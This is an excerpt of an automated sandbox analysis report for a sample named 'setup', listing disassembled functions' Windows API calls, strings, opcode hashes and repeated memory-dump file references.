                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcschr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1497570035-0
                                                                                                    • Opcode ID: 78b2a7791b26fde8304c1b6544e93fcd3c4d7fb565e058ea338a66821c544262
                                                                                                    • Instruction ID: c51ce66920f38f097df48bd00fbb3c72e4039bbaef5599864024a1b2d6334b33
                                                                                                    • Opcode Fuzzy Hash: 78b2a7791b26fde8304c1b6544e93fcd3c4d7fb565e058ea338a66821c544262
                                                                                                    • Instruction Fuzzy Hash: DF01A279108B618ADB107F29A98422FBBF0FF84744F01496EE9C48B205E3748941DB87
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strchr
                                                                                                    • String ID: :/\
                                                                                                    • API String ID: 2830005266-2793184486
                                                                                                    • Opcode ID: 872394bb5905f8e8daf418f175133769138509a6b87185b046b68c8328b374ee
                                                                                                    • Instruction ID: 00171ae99696693c757a03c557d1d64a1cdccf6636d59dea2e93849f0ef96578
                                                                                                    • Opcode Fuzzy Hash: 872394bb5905f8e8daf418f175133769138509a6b87185b046b68c8328b374ee
                                                                                                    • Instruction Fuzzy Hash: 5F016975A49762CFD311DF29844422EBBE1AB94340F5A882EA8C597302D334C949DF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strchr
                                                                                                    • String ID: :/\
                                                                                                    • API String ID: 2830005266-2793184486
                                                                                                    • Opcode ID: fd5a8b388320814173b99e97218bb2b00bd9b90984405e6c507596132186d1b2
                                                                                                    • Instruction ID: 1b7de98175cecdfd9c4d98b99df37a214705d2b313a21bace8d655519f8ae0ed
                                                                                                    • Opcode Fuzzy Hash: fd5a8b388320814173b99e97218bb2b00bd9b90984405e6c507596132186d1b2
                                                                                                    • Instruction Fuzzy Hash: 7D0157B5A48752CFD314DF29844432EBBE5AB94340F5A882EE8C597342D335D949DF82
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32(00000084,00000008,00000000,00217639), ref: 002173ED
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002173FF
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0021740B
                                                                                                      • Part of subcall function 00211239: CreateThread.KERNEL32(00000000,00000000,00000010,00000010,00000004,0035BD18), ref: 0021124B
                                                                                                      • Part of subcall function 00211239: SetThreadAffinityMask.KERNEL32(00000000,?), ref: 00211263
                                                                                                      • Part of subcall function 00211239: SetThreadPriority.KERNEL32(0035BD14,00000000,?,?,0023C461,0023C74F,00000003,00000010), ref: 00211276
                                                                                                      • Part of subcall function 00211239: ResumeThread.KERNEL32(0035BD14,?,?,0023C461,0023C74F,00000003,00000010), ref: 0021127E
                                                                                                    • VirtualLock.KERNEL32(00000000,?,00217288,00000000,00000000), ref: 0021742F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$Create$Event$AffinityCriticalInitializeLockMaskPriorityResumeSectionVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2172739642-0
                                                                                                    • Opcode ID: 991f6d745d421c2e2d905a45cd19943bdb5e7c1aa692bf59f91110645985cff3
                                                                                                    • Instruction ID: 8f1afbe25ffb64980b4f710806641b14b595a15440f1fb28b5c661177a9a85d6
                                                                                                    • Opcode Fuzzy Hash: 991f6d745d421c2e2d905a45cd19943bdb5e7c1aa692bf59f91110645985cff3
                                                                                                    • Instruction Fuzzy Hash: 99F0AC71612635BAD6209BB29D8CED7BEACFF4B2A5F000216B51892101C774A961CAF5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$AttributesDeleteLayeredObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 3455228723-0
                                                                                                    • Opcode ID: 6427368849981803eae64fc7adcbd5b39063b667b115e7b77b08a08f35b04b52
                                                                                                    • Instruction ID: 07859ca3978e3b59d2b87c24cc68ff341a228270a087a73dd413114692ff47ed
                                                                                                    • Opcode Fuzzy Hash: 6427368849981803eae64fc7adcbd5b39063b667b115e7b77b08a08f35b04b52
                                                                                                    • Instruction Fuzzy Hash: 32F0C4B1408B019FC700BF78E68921EBBF0FB85311F008A2DE4958B265D7B59459CB87
                                                                                                    APIs
                                                                                                    • longjmp.MSVCRT ref: 0020C567
                                                                                                    • malloc.MSVCRT ref: 0020CC01
                                                                                                    • malloc.MSVCRT ref: 0020CC17
                                                                                                      • Part of subcall function 001EE7F0: malloc.MSVCRT ref: 001EE800
                                                                                                      • Part of subcall function 001EE7F0: CharToOemW.USER32 ref: 001EE822
                                                                                                      • Part of subcall function 001EE7F0: free.MSVCRT ref: 001EE82E
                                                                                                    Strings
                                                                                                    • ERROR: archive structure corrupted (bad string), xrefs: 0020CC26
                                                                                                    • %s, xrefs: 0020CC46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$Charfreelongjmp
                                                                                                    • String ID: %s$ERROR: archive structure corrupted (bad string)
                                                                                                    • API String ID: 706110111-1936029760
                                                                                                    • Opcode ID: 51d8d8ec812b84132368a5e46ef953cf94c34a4383f5f7b268ff3b82592548d4
                                                                                                    • Instruction ID: e6c653bf4fcf1dac8cfddb5d9d83a26f1a5e66be7d029e6fdc23755a911a41ba
                                                                                                    • Opcode Fuzzy Hash: 51d8d8ec812b84132368a5e46ef953cf94c34a4383f5f7b268ff3b82592548d4
                                                                                                    • Instruction Fuzzy Hash: C9F03AB48287168BC721AF24C44122EBAE1BF45340F66C42DE8C867346DB74D8509F83
                                                                                                    APIs
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00000010,00000010,00000004,0035BD18), ref: 0021124B
                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,?), ref: 00211263
                                                                                                    • SetThreadPriority.KERNEL32(0035BD14,00000000,?,?,0023C461,0023C74F,00000003,00000010), ref: 00211276
                                                                                                    • ResumeThread.KERNEL32(0035BD14,?,?,0023C461,0023C74F,00000003,00000010), ref: 0021127E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AffinityCreateMaskPriorityResume
                                                                                                    • String ID:
                                                                                                    • API String ID: 3930227737-0
                                                                                                    • Opcode ID: e2cd92fec488b47265d3b93c8f2f6d81a7fbc2b396c5dffe3cb864e00859a2c4
                                                                                                    • Instruction ID: 6554aa6294f7b6293ba4903aa87170cc8dac006cce5b0f730af684130f6be2f2
                                                                                                    • Opcode Fuzzy Hash: e2cd92fec488b47265d3b93c8f2f6d81a7fbc2b396c5dffe3cb864e00859a2c4
                                                                                                    • Instruction Fuzzy Hash: 5EF0F8B5215302EFEB159FA0DC08B6ABBE9BF59302F00882DF691C11A0DBB1C860DB14
                                                                                                    APIs
                                                                                                    • longjmp.MSVCRT ref: 0020BF0F
                                                                                                    • memchr.MSVCRT ref: 0020C023
                                                                                                    • malloc.MSVCRT ref: 0020C1CC
                                                                                                    • malloc.MSVCRT ref: 0020C1E2
                                                                                                      • Part of subcall function 001EE7F0: malloc.MSVCRT ref: 001EE800
                                                                                                      • Part of subcall function 001EE7F0: CharToOemW.USER32 ref: 001EE822
                                                                                                      • Part of subcall function 001EE7F0: free.MSVCRT ref: 001EE82E
                                                                                                    Strings
                                                                                                    • ERROR: archive structure corrupted (bad string), xrefs: 0020C1F1
                                                                                                    • %s, xrefs: 0020C1A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$Charfreelongjmpmemchr
                                                                                                    • String ID: %s$ERROR: archive structure corrupted (bad string)
                                                                                                    • API String ID: 2346886604-1936029760
                                                                                                    • Opcode ID: de4d611d226597265bd38ee71c14afe2d50e959a434aaa4f93ddf9e8cf10fa07
                                                                                                    • Instruction ID: d411c1c6c1754035267f7f000bb7afc32b8d2a2809a5c27681cdb9c5bdbbec80
                                                                                                    • Opcode Fuzzy Hash: de4d611d226597265bd38ee71c14afe2d50e959a434aaa4f93ddf9e8cf10fa07
                                                                                                    • Instruction Fuzzy Hash: 44F0F8B052C7169BC321BF25C44122EB6E0BF05B40F92C82CE5C8A7282DB74C8509B97
                                                                                                    APIs
                                                                                                    • longjmp.MSVCRT ref: 0020C567
                                                                                                    • malloc.MSVCRT ref: 0020CA9D
                                                                                                    • malloc.MSVCRT ref: 0020CAB3
                                                                                                      • Part of subcall function 001EE7F0: malloc.MSVCRT ref: 001EE800
                                                                                                      • Part of subcall function 001EE7F0: CharToOemW.USER32 ref: 001EE822
                                                                                                      • Part of subcall function 001EE7F0: free.MSVCRT ref: 001EE82E
                                                                                                    Strings
                                                                                                    • ERROR: archive structure corrupted (bad string), xrefs: 0020CAC2
                                                                                                    • %s, xrefs: 0020CAE2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$Charfreelongjmp
                                                                                                    • String ID: %s$ERROR: archive structure corrupted (bad string)
                                                                                                    • API String ID: 706110111-1936029760
                                                                                                    • Opcode ID: 72d83252aa141f99275eb754e26c58d7d50ef0728c1d6d1ecb7658c423c74404
                                                                                                    • Instruction ID: 81dfa4fa9d3bf652eb5fbbb0aa1f55608b8e92846991843f2a19436cf0ed155f
                                                                                                    • Opcode Fuzzy Hash: 72d83252aa141f99275eb754e26c58d7d50ef0728c1d6d1ecb7658c423c74404
                                                                                                    • Instruction Fuzzy Hash: 30F030F442CB129BC721BF24840121EFAE0AF41740F52891DE8C86B342CB74DC509F87
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
